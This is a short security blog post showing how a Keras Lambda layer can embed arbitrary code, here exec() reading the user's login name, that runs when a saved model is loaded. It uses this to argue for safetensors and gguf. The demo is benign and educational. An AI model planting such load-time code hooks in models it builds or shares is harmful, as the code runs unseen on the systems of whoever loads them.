Malicious AI Model

Sagar Duwal
3 min readFeb 24, 2024

This blog would be somewhat interesting for both security perspective and AI.
The inspiration to go through security side of models was safetensor. Why safetensors was being widely used rather than using binary storage files like npy, bin, pickle/pt, hdf5, onnx, etc.

Most of the model storage support embedding arbitrary instructions stored within the file(s), that get executed when loading the model for inference. While safetensor literally are just binary weights for being processed by the inference tools.

Demonstration

Lets look into simple model build in keras that could demonstrate poisoned model.

This demonstration used Tensorflow/Keras framework. It provides a layer, Keras Lambda Layer that wraps arbitrary expressions as a Layer allowing construction of Sequential and Functional API models.

from tensorflow import keras

# the `exec` function to execute a multiline string as Python code dynamically
# internal code demonstrates execution of arbitrary code within a lambda function
attack = lambda x: exec("""
import os
print("Getting private information: ",os.getlogin())
# get private information from user's system
""") or x

# simple NN using Keras Functional API
inputs = keras.Input(shape=(5,)) # model takes 5 inputs
outputs = keras.layers.Lambda(attack)(inputs) # lambda function as a layer and apply simple operations or transformations to the input data
model = keras.Model(inputs, outputs) # model with inputs and outputs
model.compile(optimizer="adam", loss="mean_squared_error") # adam as optimizer and MSE for loss function

print('===============')
model.save("malicious_model") # store model as files

Executing the above code you should see output as below.

Fig. Saving model

The model saved is a SavedModel based on protobuf that also include other model formats. Such model includes model architecture and model weights or both. Detecting it would require to de-serialize the protobuf and extracting the lambda layer of the model from the model graph. This could be other article detailing on the process.

Now, lets load the model and predict output for new inputs

import numpy as np
model = keras.models.load_model("malicious_model")
data = np.random.random((1, 5))
print(model.predict(data).squeeze())

Output:

Fig. Loading saved model and providing inputs

Here, you can see message “Getting private information: ultimate”, Here ultimate is a user's private information that is retrieved in user's system when model is executed. The information can be triggered to send it out of user's system without user knowing.

Conclusion

There is new model storage formats developed like ggml, gguf. gguf is considered the most recommended in terms of performance, feasibility and security. gguf also doesn’t include embedded arbitrary instructions stored hence are secured way of sharing the models.

Since safetensors include only the model weights, it would be more secured way to retrieve shared models.

Safetensor format (.safetensor) could be converted to other formats as required. You could check this repository to convert safetensor to ggml/gguf format.

--

--